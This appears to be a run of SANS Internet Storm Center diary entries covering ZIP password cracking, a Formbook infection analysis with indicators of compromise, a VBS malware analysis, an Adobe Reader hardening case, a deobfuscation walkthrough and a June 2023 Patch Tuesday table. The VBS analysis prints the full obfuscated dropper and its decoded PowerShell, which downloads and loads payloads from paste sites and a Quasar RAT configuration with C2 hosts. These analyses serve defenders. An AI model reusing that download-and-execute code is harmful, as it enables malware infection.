I'm using these parameters: maximum=4,charsets=lud

This starts a brute-force attack of passwords consisting of uppercase and lowercase letters and digits, between 1 and 4 characters long.

With these parameters, it took 505 seconds to recover the password: X353.

ZIP files that are encrypted with AES (like the samples you get from Malware Bazaar) requier installation of the pyzipper module and are way slower to crack (less than 2.000 password guesses per second on the same laptop).

Remark that this solution only handles ZIP files, and not all archive types like Gebhard's shell script.

zipdump can also generated false positives. ZIP files that can be openened with a guessed password through the zipfile/pyzipper API, may still throw an error when the full content is actually read:

This is something I will fix in an upcoming version.

This dictionary and brute-force password cracking is just a convenience feature for me, to crack simple or popular passwords. For more complex passwords, I use hashcat.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Introduction

I'm currently doing a "30 days of Formbook" collection effort, generating infection traffic from recent Formbook samples and posting the results to my blog.  On Friday 2023-06-16, I ran across an example that kicks off with an Excel file exploiting CVE-2017-11882 to use what seems like ModiLoader (also known as DBatLoader).

I previously wrote about ModiLoader for Remcos RAT in an ISC diary last month.  In today's diary, I'll review an infection that I think is ModiLoader Formbook from my infection run yesterday (Friday, 2023-06-16).

Shown above:  Flow chart for my Formbook infection from possible ModiLoader.

The Initial Lure

The initial lure was a file created with Excel to exploit an old vulnerability for CVE-2017-11882.  I used a Windows 7 host with Office 2007 as a vulnerable system in my lab to test the sample.

Shown above:  The initial lure opened in Office 2007 Excel.

After opening the initial lure, the file retrieved a loader-style EXE, and that loader-style EXE retrieved base64 text over HTTPS from qu[.]ax as shown below.  Approximately one minute later, the Formbook C2 traffic started.

Shown above:  Traffic from the infection run filtered in Wireshark.

Checking the loader EXE in a sandbox revealed the loader retrieved a base64 text file from hxxps://qu[.]ax/NNAs.wav.  The base64 text represents a malicious DLL file in reverse byte order.  Fortunately CyberChef can easily decode the text and return the binary.

Shown above:  Downloading the loader EXE's payload from hxxps://qu[.]ax/NNAs.wav in a web browser.

Shown above:  Checking the downloaded file to find it's base64 text.

Shown above:  Decoding the base64 text file in CyberChef to reveals a malicious EXE or DLL.

Shown above:  Checking the converted file and discovering it's a DLL.

Post-infection Forensics

Examining my infected lab host revealed the loader EXE was made persistent through the Windows registry.  My investigation also found a copy of MSBuild.exe (a legitimate file for the Microsoft Build Engine) made persistent in the same manner I usually see for Formbook.  I've done similar, undocumented infection runs with confirmed ModiLoader samples for Formbook, and each of those also had some sort of non-Formbook, legitimate file where I would normally see a Formbook EXE.  This seems common for ModiLoader Formbook infections.

Shown above:  Artifacts from my infection run.

Indicators of Compromise (IOCs)

The following are malware/artifacts from this infection run.

Malware/artifacts from the infection run:

SHA256 hash: 4f6e9a66f50f443d07676ef43a7f2349fc713c96522058c1c4d425da7be4a4bf

File size: 1,821,184 bytes
File name: DC293_payment.xls
File type: Composite Document File V2 Document (created with Excel)
File description: File exploiting CVE-2017-11882 in vulnerable versions of Microsoft Excel

SHA256 hash: 8566d2bf58fe371e646076c60874a8fbb50de2fbf9b950c457804d316a3de89f

File size: 94,208 bytes
File location: htxxp://23.94.144[.]13/555/vbc.exe
File location: C:\Users\Public\cleanmgr_rse.exe
Persistent file location: C:\Users\[username]\AppData\Roaming\bestm.exe
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File description: possible ModiLoader (DBatLoader) EXE for Formbook version 4.1

SHA256 hash: 16c7760898572422cac97f705e9076c35610a07fbc40aaa91b5663af923cdca7

File size: 1,036,972 bytes
File location: hxxps://qu[.]ax/NNAs.wav
File type: ASCII text, with very long lines (65536), with no line terminators
File description: Base64 text retrieved by ModiLoader for Formbook
Note: File is decords to a Windows DLL in reverse byte order

SHA256 hash: cfc4f6c4931fc8df03919d96181178a903a6ccd39eb5268ac00b3a223c027b5b

File size: 777,728 bytes
File type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
File description: Windows DLL converted from the above Base64 text
Run method: unknown

SHA256 hash: d94e9ea7dce3dd4760f48356f14a986ea1fc8f1c84864105bf815a32284296ab

File size: 261,688 bytes
File location: C:\Program Files (x86)\W2d0\k6qlvnu84nj0.exe
File type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
File description: Copy of legitimate Microsoft file msbuild.exe (not inherently malicious)

Windows Registry key: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Value 0

name: bestm
type: REG_SZ
data: "C:\Users\[username]\AppData\Roaming\bestm.exe"

Value 1

name: YDD0P4187
type: REG_SZ
data: C:\Program Files (x86)\W2d0\k6qlvnu84nj0.exe

HTTP GET and POST requests:

GET /tfgp/?[string of alphanumeric characters with the following mixed in: = _ + and /]
POST /tfgp/

Domains used for Formbook C2 traffic:

DNS query for www.valleyofbreath[.]com - no response from DNS server
DNS query for www.website-dolap[.]com - no response from DNS server
DNS query for www.cloudzon[.]world - response: No such name
DNS query for www.eperq[.]buzz - response: No such name
DNS query for www.nolinkoti[.]biz - response: No such name
DNS query for www.simplepay[.]kitchen - response: No such name
DNS query for www.thecharmingchimp[.]com - response: No such name
DNS query for www.theclockpeddler[.]com - response: No such name
DNS query for www.thewoodeniphonecase[.]com - response: No such name
DNS query for www.yolcu360online[.]autos - response: No such name
DNS query for www.youhousedesign[.]com - response: No such name
DNS query for www.rtlsdepmpyv7[.]com - no IP returned from DNS server

www.chaintrt[.]com - TCP SYN segments only, no response or RST from server
www.cleanskinshop[.]com - TCP SYN segments only, no response or RST from server
www.hew9[.]xyz - TCP SYN segments only, no response or RST from server

www.astudyinstories[.]com - GET /tfgp/[string]
www.bjhxtp[.]com - GET /tfgp/[string]
www.ctrivertravel[.]net - GET /tfgp/[string]
www.dl-jmjg[.]com - GET /tfgp/[string]
www.driversofficial[.]com - GET /tfgp/[string]
www.eliteenduranceuk[.]com - GET /tfgp/[string]
www.firstonsiterestoration[.]com - GET /tfgp/[string]
www.ganosignsandprinting[.]com - GET /tfgp/[string]
www.langlaufdavos[.]com - GET /tfgp/[string]
www.martynasobczak[.]com - GET /tfgp/[string]
www.openseamonkeys[.]com - GET /tfgp/[string]
www.unbecomingsail[.]xyz - GET /tfgp/[string]

www.4thmainland[.]com - GET /tfgp/[string] and POST /tfgp/ requests
www.abhisheksharma[.]life - GET /tfgp/[string] and POST /tfgp/ requests
www.babyshoespromo[.]com - GET /tfgp/[string] and POST /tfgp/ requests
www.gameozo[.]com - GET /tfgp/[string] and POST /tfgp/ requests
www.livetcvety[.]ru - GET /tfgp/[string] and POST /tfgp/ requests
www.porgy[.]online - GET /tfgp/[string] and POST /tfgp/ requests
www.sagewoodworkinginc[.]com - GET /tfgp/[string] and POST /tfgp/ requests
www.strattmanwedding[.]com - GET /tfgp/[string] and POST /tfgp/ requests
www.ytdxjt[.]com - GET /tfgp/[string] and POST /tfgp/ requests

Final Words

Since this infection chain relies on a 2017 vulnerability, anyone with a Windows 10 or 11 host running an up-to-date/patched version of Microsoft Office will not be affected.  When checked against VirusTotal, the malicious Excel, EXE, and DLL files have a decent detection rate.  This is not a high-risk infection for many people.  Perhaps the most interesting thing is that new malware samples exploiting CVE-2017-11882 like this one are submitted to VirusTotal on a daily (or near-daily) basis.

A packet capture (pcap) from the infection run, along the with associated malware and artifacts are available here.

---
Brad Duncan
brad [at] malware-traffic-analysis.net

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

VBS looks popular these days! After the last Didier's diary, I found another interesting script. It started with an email that referenced a fake due invoice. The invoice icon pointed to a URL. Usually, such URLs display a fake login page asking for credentials. Not this time.

PrivateEmail is an online service operated by NameCheap that offers email and collaboration tools (like a shared drive). It relies on Open-Xchange. They offer a free account for one mailbox and 5GB of storage. This is a simple way to deliver a payload, and the domain has a good reputation.

The shared file is “INV.10931.vbs” (SHA256:980b05b8a4ccbb444da3f7a1174e4c0e902a8ed199e4af2f3153e320809ab7cc) and has a low VT score (10/59). If you select the "Info" button on the top-right of the screen, you'll see that the file was modified on June 14th by "helen@alpinearospace.com". This domain was registered at NameCheap on May 26th. This is probably the free account created by the attacker. Did you spot the typosquatting related to the domain alpineaerospace.com[1]?

Let’s have a look at the content. This file uses a lot of obfuscation techniques! The first one is the encoding. Starting with 0xFFEE, the file is Unicode encoded. This means that it won’t match simple scripts running on Linux environments:

remnux@remnux:/MalwareZoo/20230615$ xxd INV.10931.vbs |head -5 00000000: fffe 0d00 0a00 0d00 0a00 0d00 0a00 0d00 ................ 00000010: 0a00 0d00 0a00 0d00 0a00 0d00 0a00 0d00 ................ 00000020: 0a00 2700 2f00 2f00 2f00 2f00 2f00 2f00 ..'././././././. 00000030: 2f00 2f00 2f00 2f00 2f00 2f00 2f00 2f00 /./././././././. 00000040: 2f00 2f00 2f00 2f00 2f00 2f00 2f00 2f00 /./././././././.

Then, the script is polluted with plenty of repeating functions that do nothing (junk code):

remnux@remnux:/MalwareZoo/20230615$ cat INV.10931.vbs | tr -d '\00' | grep ^Function | wc -l 87

Let’s clean up the file and also remove the comments:

remnux@remnux:/MalwareZoo/20230615$ cat INV.10931.vbs | tr -d '\00' | grep -v "^'" | sed -e '/^Function/,/^End Function/d' wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye: wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye: wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye:iufpc:wwoye: dim uRUs uRUs = WScript.ScriptFullName HwxcO = ("J1 Bu1 Gs1 b1 Bp1 G01 I1 1 91 C1 1 Jw1 w1 DE1 Mg1 z1 DQ1 Jw1 71 CQ1 awBn1 HQ1 b1 B31 C1 1 PQ1 g1 Cc1 JQBw1 Ho1 QQBj1 E81 ZwBJ1 G41 TQBy1 CU1 Jw1 71 Fs1 QgB51 HQ1 ZQBb1 F01 XQ1 g1 CQ1 cwBz1 Hg1 dQBw1 C1 1 PQ1 g1 Fs1 cwB51 HM1 d1 Bl1 G01 LgBD1 G81 bgB21 GU1 cgB01 F01 Og1 61 EY1 cgBv1 G01 QgBh1 HM1 ZQ1 21 DQ1 UwB01 HI1 aQBu1 Gc1 K1 1 g1 Cg1 TgBl1 Hc1 LQBP1 GI1 agBl1 GM1 d1 1 g1 E41 ZQB01 C41 VwBl1 GI1 QwBs1 Gk1 ZQBu1 HQ1 KQ1 u1 EQ1 bwB31 G41 b1 Bv1 GE1 Z1 BT1 HQ1 cgBp1 G41 Zw1 o1 C1 1 K1 BO1 GU1 dw1 t1 E81 YgBq1 GU1 YwB01 C1 1 TgBl1 HQ1 LgBX1 GU1 YgBD1 Gw1 aQBl1 G41 d1 1 p1 C41 R1 Bv1 Hc1 bgBs1 G81 YQBk1 FM1 d1 By1 Gk1 bgBn1 Cg1 JwBo1 HQ1 d1 Bw1 HM1 Og1 v1 C81 c1 Bh1 HM1 d1 Bl1 GI1 aQBu1 C41 YwBv1 G01 LwBy1 GE1 dw1 v1 F1 1 VQBn1 G01 VQBU1 Gk1 S1 1 n1 Ck1 I1 1 p1 C1 1 KQ1 71 Fs1 cwB51 HM1 d1 Bl1 G01 LgBB1 H1 1 c1 BE1 G81 bQBh1 Gk1 bgBd1 Do1 OgBD1 HU1 cgBy1 GU1 bgB01 EQ1 bwBt1 GE1 aQBu1 C41 T1 Bv1 GE1 Z1 1 o1 CQ1 cwBz1 Hg1 dQBw1 Ck1 LgBH1 GU1 d1 BU1 Hk1 c1 Bl1 Cg1 JwBD1 GQ1 VwBE1 GQ1 Qg1 u1 EQ1 SwBl1 FM1 dgBs1 Cc1 KQ1 u1 Ec1 ZQB01 E01 ZQB01 Gg1 bwBk1 Cg1 JwBO1 G41 SQBh1 FU1 cQ1 n1 Ck1 LgBJ1 G41 dgBv1 Gs1 ZQ1 o1 CQ1 bgB11 Gw1 b1 1 s1 C1 1 WwBv1 GI1 agBl1 GM1 d1 Bb1 F01 XQ1 g1 Cg1 JwBq1 G01 cwBS1 G41 V1 BY1 EY1 R1 BD1 FY1 e1 1 v1 GQ1 YQBv1 Gw1 bgB31 G81 Z1 1 v1 G01 bwBj1 C41 bwBp1 GU1 d1 Bz1 GE1 c1 1 v1 C81 OgBz1 H1 1 d1 B01 Gg1 Jw1 g1 Cw1 I1 1 k1 Gs1 ZwB01 Gw1 dw1 g1 Cw1 I1 1 n1 E81 YQBN1 Fk1 Qw1 n1 Cw1 I1 1 k1 G41 awBs1 Gk1 bQ1 s1 C1 1 Jw1 x1 Cc1 L1 1 g1 Cc1 UgBv1 GQ1 YQ1 n1 C1 1 KQ1 p1 Ds1 ") dim nabnr nabnr = ("$ExeNy = '") & HwxcO & "'" nabnr = nabnr & ";$KByHL = [system.Text.Encoding]::Unicode.GetString( " nabnr = nabnr & "[system.Convert]::FromBase64String( $ExeNy.replace('1 ','A') ) )" nabnr = nabnr & ";$KByHL = $KByHL.replace('%pzAcOgInMr%', '" & uRUs & "');powershell -command $KByHL;" set wcwpz = CreateObject("WScript.Shell") wcwpz.Run "powershell -command " & (nabnr) , 0, false

We have another problem with the file. It won’t work as is. The variable “HwxcO” is a Base64-encoded string that has been polluted with a character that is replaced by ‘A’ during execution:

The character looks like a percentage (“%”) with it. It’s the Unicode character 0x2031[2]

Let’s decode the Base64 with Cyberchef:

Now, we have this script: (beautified for easier reading)

$nklim = '01234'; $kgtlw = '%pzAcOgInMr%'; [Byte[]] $ssxup = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString( \\ (New-Object Net.WebClient).DownloadString('hxxps://pastebin[.]com/raw/PUgmUTiH') ) );[system.AppDomain]::CurrentDomain.Load($ssxup).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke( \\   $null, [object[]] ('jmsRnTXFDCVx/daolnwod/moc.oietsap//:sptth' , $kgtlw , 'OaMYC', $nklim, '1', 'Roda' ));

You can see that another Base64 data is downloaded from pastebin.com. Unfortunately, the pastie has been removed. However, it’s easy to understand the purpose of the script when you see something like:

[system.AppDomain]::CurrentDomain.Load($ssxup).GetType('CdWDdB.DKeSvl').GetMethod('NnIaUq').Invoke()

Another payload will be downloaded from another paste website: hxxps://pasteio[.]com/download/xVCDFXTnRsmj (the string has been reversed). This payload was still online and is a Base64-encode sample of a Quasar RAT[3] (SHA256:80ceb442697d42cb5ba74d201b128b805d135b37ca3319560264406d0f73a8ab)

Here is the configuration extracted with the C2 server:

{ "c2": [ "127.0.0.1:4782", "venomia[.]ddns[.]net:3202" ], "attr": { "startup_key": "Adobe Client Startup", "install_name": "Venom.exe", "log_directory": "Logs", "encryption_key": "8A1JLAOW6hwwDDbIAN4N", "reconnect_delay": 3000 }, "rule": "Quasar", "mutex": [ "19qmFpMzgDFlPZQoYW" ], "botnet": "Venom ClientA", "family": "quasar", "version": "2.7.0.0" }

[1] http://www.alpineaerospace.com
[2] https://www.compart.com/en/unicode/U+2031
[3] https://github.com/quasar/Quasar

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Managing vulnerabilities in operating systems and software can be challenging and even contentious. Opinions are divided among industry peers – some argue that security updates would be unnecessary if developers were held accountable for security vulnerabilities [1]. In contrast, others assert that updating systems as soon as possible (where applicable) was a critical best practice for users [2]. Most clients in my consulting job adopt some form of vulnerability management paradigm (quarterly vulnerability assessments and addressing discovered vulnerabilities to automated vulnerability management programs where identified vulnerabilities are addressed as soon as possible). I noticed some peculiarities while providing consultancy services to a discerning customer's automated vulnerability management program. The automated vulnerability management product will not be discussed here as it is neither the main focal point nor a debate on whether the product is trustworthy. Instead, it was serendipitous and stemmed from just a simple drive to appropriately mitigate identified vulnerabilities in all systems. Together with the client's management support, we worked together to address the vulnerability in question while ensuring it was fully mitigated.

It all started when a new low-risk vulnerability was identified – the Adobe Acrobat Reader software installed on the client's assets (a Windows enterprise environment with a heavy majority of Windows 10 Version 22H2 clients) were identified to have JavaScript enabled. Typically, there is no business need for JavaScript to be enabled in Adobe Reader, especially if users only need to view documents and occasionally fill in simple form fields. As such, the vulnerability management tool advised that JavaScript be disabled and even provided steps to do so. In this case, the recommended action was to set the registry key HKLM\SOFTWARE\Policies\Adobe\Adobe Acrobat\DC\FeatureLockDown\bDisableJavaScript to the REG_DWORD value of 1. The change management team approved the configuration change, and the system administrator was tasked to implement the hardening configuration.

While reviewing the configuration change status, I also came across Adobe's own advisory on how to adjust the usage of JavaScript within their products [3]. Adobe's suggested configuration did not require administrative privileges or Windows registry modifications. I then had a random thought – what if the proposed configuration change by the vulnerability management tool did not work as intended, and JavaScript was still being enabled despite the registry key change?

An experiment was in order, and I was fortunate that the system administrator was game enough to allow me to test things out. We searched for a simple JavaScript PDF file [4], verified its functionality, and executed it on two clients – one configured according to the recommendations of the vulnerability management tool. In contrast, the other client was configured according to the documentation by Adobe. Of course, the clients were rebooted after the configuration.

Surprisingly, the client configured according to the documentation by Adobe did not allow JavaScript execution, while the client with the registry key modification allowed JavaScript to execute. This introduced a small challenge – clients that had the registry key modified were shown to have the vulnerability mitigated (the hardening process took place over a period of time) by the vulnerability management tool. Meanwhile, the particular client with custom configuration within Adobe Acrobat Reader was shown as vulnerable to JavaScript execution when it was configured to disable JavaScript execution. Management was notified immediately, and the stakeholders decided to roll back the previous configuration and implement the configuration suggested by Adobe. The vulnerability highlighted in the vulnerability management tool was added to the list of exceptions, with an explanation detailing the actual configuration and the client noting that the vulnerability had been resolved.

The adage of "Trust, but verify" appears to hold true. A quick literature review online regarding the registry key configuration yielded multiple positive feedback (JavaScript was disabled). If the client had just implemented the change without verification, the vulnerability management tool would have shown that the vulnerability was resolved. However, the environment would still have been vulnerable to PDF JavaScript execution – a risk that the client's management was unwilling to accept. As such, verifying resolved vulnerabilities must be performed even if a vulnerability management program is in place. From a consulting perspective, professional skepticism (even though this is usually articulated in accountancy audits) can add value to a client's cybersecurity posture and sometimes even yield unexpected findings in cybersecurity assessments.

References:
1. https://doi.ieeecomputersociety.org/10.1109/TSE.2022.3176674 
2. https://doi.org/10.1145/3587826
3. https://helpx.adobe.com/acrobat/using/javascripts-pdfs-security-risk.html
4. https://acrobatusers.com/assets/collections/tutorials/legacy/tech_corners/javascript_corner/tips/2006/popup_windows_part2/AlertBoxExamples.pdf

-----------
Yee Ching Tok, Ph.D., ISC Handler
Personal Site
Mastodon
Twitter

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

A reader asked us for help with the deobfuscation of a VBS script (4cd33a3c0d5f655b1bec2be6cbde096ddef696fdcd1685a512703e08514346c0).

It contains line comments with gibberish (REM and ') to obfuscate the real script:

These can be removed with a grep -v and regexes ^REM and ^', like this:

This looks like an encoded payload. After these concatenations, we have more concatenations, but of single characters, and these do not seem to be encoded:

They can be grepped for:

And with re-search.py, the value of each string can be extracted (str-u: double-quoted string, unquoted):

All these lines can be joined together with sets.py:

This looks like a reversed URL. python-per-line.py can be used to reverse each line (line[::-1] is the Python expression to reverse a line):

A similar command can be used for the other variable (nP):

The obfuscated payload can be extracted like this:

I will dedicate a diary entry on analysis methods of this type of encoding, but let me already explain here very briefly how it works.

Every characted of the script is represented by a token consisting of two upper-case letters. For example, character e is represented by token IZ.

The first 256 tokens in the above string define the translation table, and the rest of the tokens are the encoded payload. Here is a Python script to do the decoding:

def SplitLength(str, length): return [str[i:i + length] for i in range(0, len(str), length)] def Decode(str, sizeToken, sizeTokenTable): translation = str[:sizeToken * sizeTokenTable] code = str[sizeToken * sizeTokenTable:] dTranslate = {token:counter for counter, token in enumerate(SplitLength(translation, sizeToken))} return ''.join([chr(dTranslate[token]) for token in SplitLength(code, sizeToken)])

The "dTranslate =" line builds a translation dictionary out of the 256 first tokens.

And the next line does the translation of the remaining tokens.

At the time of analysis, the MSI file was no longer present on this file sharing service, and I could not find it on VirusTotal.

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Today's Microsoft patch Tuesday addresses 94 vulnerabilities. This includes 14 Chromium vulnerabilities patched in Microsoft Edge, and five GitHub vulnerabilites. Six of these vulnerabilities are rated as critical.

 Three critical vulnerabilities are remote code execution vulnerabilities related to the Windows Pragmatic Multicast (PGM) service. Past PGM vulnerabilities were related to the Microsoft Message Queue (MSMQ), for example, CVE-2023-28250, which was patched in April. 

Two of the important vulnerabilities are caused by Microsoft Exchange. Exploitation requires authentication, so these remote code execution vulnerabilities are only regarded as important. But based on history with similar flaws, this issue is worth watching. 

A critical vulnerability patched in Sharepoint allows the spoofing of JWT authentication tokens to gain access as an authenticated user.

This month, none of the vulnerabilities were made public before patch Tuesday, and none of them are already exploited.

 

Description CVE Disclosed Exploited Exploitability (old versions) current version Severity CVSS Base (AVG) CVSS Temporal (AVG) .NET Framework Remote Code Execution Vulnerability %%cve:2023-29326%% No No - - Important 7.8 6.8 .NET and Visual Studio Denial of Service Vulnerability %%cve:2023-32030%% No No - - Important 7.5 6.7 .NET and Visual Studio Elevation of Privilege Vulnerability %%cve:2023-32032%% No No - - Important 6.5 5.9 %%cve:2023-33135%% No No - - Important 7.3 6.6 .NET and Visual Studio Remote Code Execution Vulnerability %%cve:2023-33126%% No No - - Important 7.3 6.6 %%cve:2023-33128%% No No - - Important 7.3 6.6 .NET, .NET Framework, and Visual Studio Denial of Service Vulnerability %%cve:2023-29331%% No No - - Important 7.5 6.7 .NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability %%cve:2023-24936%% No No - - Moderate 8.1 7.1 .NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability %%cve:2023-24897%% No No - - Critical 7.8 6.8 %%cve:2023-24895%% No No - - Important 7.8 6.8 AutoDesk: CVE-2023-27909 Out-Of-Bounds Write Vulnerability in Autodesk FBX SDK 2020 or prior %%cve:2023-27909%% No No - - Important     AutoDesk: CVE-2023-27910 stack buffer overflow vulnerability in Autodesk FBX SDK 2020 or prior %%cve:2023-27910%% No No - - Important     AutoDesk: CVE-2023-27911 Heap buffer overflow vulnerability in Autodesk FBX SDK 2020 or prior %%cve:2023-27911%% No No - - Important     Azure DevOps Server Spoofing Vulnerability %%cve:2023-21565%% No No - - Important 7.1 6.2 %%cve:2023-21569%% No No - - Important 5.5 4.8 Chromium: CVE-2023-2929 Out of bounds write in Swiftshader %%cve:2023-2929%% No No - - -     Chromium: CVE-2023-2930 Use after free in Extensions %%cve:2023-2930%% No No - - -     Chromium: CVE-2023-2931 Use after free in PDF %%cve:2023-2931%% No No - - -     Chromium: CVE-2023-2932 Use after free in PDF %%cve:2023-2932%% No No - - -     Chromium: CVE-2023-2933 Use after free in PDF %%cve:2023-2933%% No No - - -     Chromium: CVE-2023-2934 Out of bounds memory access in Mojo %%cve:2023-2934%% No No - - -     Chromium: CVE-2023-2935 Type Confusion in V8 %%cve:2023-2935%% No No - - -     Chromium: CVE-2023-2936 Type Confusion in V8 %%cve:2023-2936%% No No - - -     Chromium: CVE-2023-2937 Inappropriate implementation in Picture In Picture %%cve:2023-2937%% No No - - -     Chromium: CVE-2023-2938 Inappropriate implementation in Picture In Picture %%cve:2023-2938%% No No - - -     Chromium: CVE-2023-2939 Insufficient data validation in Installer %%cve:2023-2939%% No No - - -     Chromium: CVE-2023-2940 Inappropriate implementation in Downloads %%cve:2023-2940%% No No - - -     Chromium: CVE-2023-2941 Inappropriate implementation in Extensions API %%cve:2023-2941%% No No - - -     Chromium: CVE-2023-3079 Type Confusion in V8 %%cve:2023-3079%% No No - - -     DHCP Server Service Information Disclosure Vulnerability %%cve:2023-29355%% No No - - Important 5.3 4.6 Dynamics 365 Finance Spoofing Vulnerability %%cve:2023-24896%% No No - - Important 5.4 4.7 GDI Elevation of Privilege Vulnerability %%cve:2023-29359%% No No - - Important 7.8 6.8 GitHub: CVE-2023-25652 "git apply --reject" partially-controlled arbitrary file write %%cve:2023-25652%% No No - - Important     GitHub: CVE-2023-25815 Git looks for localized messages in an unprivileged place %%cve:2023-25815%% No No - - Important     GitHub: CVE-2023-29007 Arbitrary configuration injection via `git submodule deinit` %%cve:2023-29007%% No No - - Important     GitHub: CVE-2023-29011 The config file of `connect.exe` is susceptible to malicious placing %%cve:2023-29011%% No No - - Important     GitHub: CVE-2023-29012 Git CMD erroneously executes `doskey.exe` in current directory, if it exists %%cve:2023-29012%% No No - - Important     Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability %%cve:2023-33143%% No No Less Likely Less Likely Moderate 7.5 6.5 Microsoft Edge (Chromium-based) Information Disclosure Vulnerability %%cve:2023-33145%% No No Less Likely Less Likely Important 6.5 5.7 Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability %%cve:2023-29345%% No No Less Likely Less Likely Low 6.1 5.3 Microsoft Excel Remote Code Execution Vulnerability %%cve:2023-32029%% No No - - Important 7.8 6.8 %%cve:2023-33137%% No No - - Important 7.8 6.8 %%cve:2023-33133%% No No - - Important 7.8 6.8 Microsoft Exchange Server Remote Code Execution Vulnerability %%cve:2023-28310%% No No - - Important 8.0 7.0 %%cve:2023-32031%% No No - - Important 8.8 7.7 Microsoft ODBC Driver Remote Code Execution Vulnerability %%cve:2023-29373%% No No - - Important 8.8 7.7 Microsoft Office Remote Code Execution Vulnerability %%cve:2023-33146%% No No - - Important 7.8 6.8 Microsoft OneNote Spoofing Vulnerability %%cve:2023-33140%% No No - - Important 6.5 5.7 Microsoft Outlook Remote Code Execution Vulnerability %%cve:2023-33131%% No No - - Important 8.8 7.7 Microsoft PostScript Printer Driver Remote Code Execution Vulnerability %%cve:2023-32017%% No No - - Important 7.8 6.8 Microsoft Power Apps Spoofing Vulnerability %%cve:2023-32024%% No No - - Important 3.0 2.6 Microsoft SharePoint Denial of Service Vulnerability %%cve:2023-33129%% No No - - Important 6.5 5.7 Microsoft SharePoint Server Elevation of Privilege Vulnerability %%cve:2023-29357%% No No - - Critical 9.8 8.5 %%cve:2023-33142%% No No - - Important 6.5 5.7 Microsoft SharePoint Server Spoofing Vulnerability %%cve:2023-33130%% No No - - Important 7.3 6.4 %%cve:2023-33132%% No No - - Important 6.3 5.5 Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability %%cve:2023-29372%% No No - - Important 8.8 7.7 NTFS Elevation of Privilege Vulnerability %%cve:2023-29346%% No No - - Important 7.8 6.8 NuGet Client Remote Code Execution Vulnerability %%cve:2023-29337%% No No - - Important 7.1 6.2 Remote Desktop Client Remote Code Execution Vulnerability %%cve:2023-29362%% No No - - Important 8.8 7.7 Remote Procedure Call Runtime Denial of Service Vulnerability %%cve:2023-29369%% No No - - Important 6.5 5.7 Sysinternals Process Monitor for Windows Denial of Service Vulnerability %%cve:2023-29353%% No No - - Low 5.5 4.8 Visual Studio Code Spoofing Vulnerability %%cve:2023-33144%% No No - - Important 5.0 4.5 Visual Studio Information Disclosure Vulnerability %%cve:2023-33139%% No No - - Important 5.5 5.0 Windows Authentication Elevation of Privilege Vulnerability %%cve:2023-29364%% No No - - Important 7.0 6.3 Windows Bus Filter Driver Elevation of Privilege Vulnerability %%cve:2023-32010%% No No - - Important 7.0 6.1 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability %%cve:2023-29361%% No No - - Important 7.0 6.1 Windows Collaborative Translation Framework Elevation of Privilege Vulnerability %%cve:2023-32009%% No No - - Important 8.8 7.7 Windows Container Manager Service Elevation of Privilege Vulnerability %%cve:2023-32012%% No No - - Important 6.3 5.5 Windows CryptoAPI Denial of Service Vulnerability %%cve:2023-24937%% No No - - Important 6.5 5.7 %%cve:2023-24938%% No No - - Important 6.5 5.7 Windows DNS Spoofing Vulnerability %%cve:2023-32020%% No No - - Important 3.7 3.2 Windows Filtering Platform Elevation of Privilege Vulnerability %%cve:2023-29368%% No No - - Important 7.0 6.1 Windows GDI Elevation of Privilege Vulnerability %%cve:2023-29358%% No No - - Important 7.8 6.8 %%cve:2023-29371%% No No - - Important 7.8 6.8 Windows Geolocation Service Remote Code Execution Vulnerability %%cve:2023-29366%% No No - - Important 7.8 6.8 Windows Group Policy Elevation of Privilege Vulnerability %%cve:2023-29351%% No No - - Important 8.1 7.1 Windows Hello Remote Code Execution Vulnerability %%cve:2023-32018%% No No - - Important 7.8 6.8 Windows Hyper-V Denial of Service Vulnerability %%cve:2023-32013%% No No - - Critical 6.5 5.7 Windows Installer Information Disclosure Vulnerability %%cve:2023-32016%% No No - - Important 5.5 4.8 Windows Kernel Information Disclosure Vulnerability %%cve:2023-32019%% No No - - Important 4.7 4.1 Windows Media Remote Code Execution Vulnerability %%cve:2023-29365%% No No - - Important 7.8 6.8 %%cve:2023-29370%% No No - - Important 7.8 6.8 Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability %%cve:2023-29363%% No No - - Critical 9.8 8.5 %%cve:2023-32014%% No No - - Critical 9.8 8.5 %%cve:2023-32015%% No No - - Critical 9.8 8.5 Windows Remote Desktop Security Feature Bypass Vulnerability %%cve:2023-29352%% No No - - Important 6.5 5.7 Windows Resilient File System (ReFS) Remote Code Execution Vulnerability %%cve:2023-32008%% No No - - Important 7.8 6.8 Windows SMB Witness Service Security Feature Bypass Vulnerability %%cve:2023-32021%% No No - - Important 7.1 6.2 Windows Server Service Security Feature Bypass Vulnerability %%cve:2023-32022%% No No - - 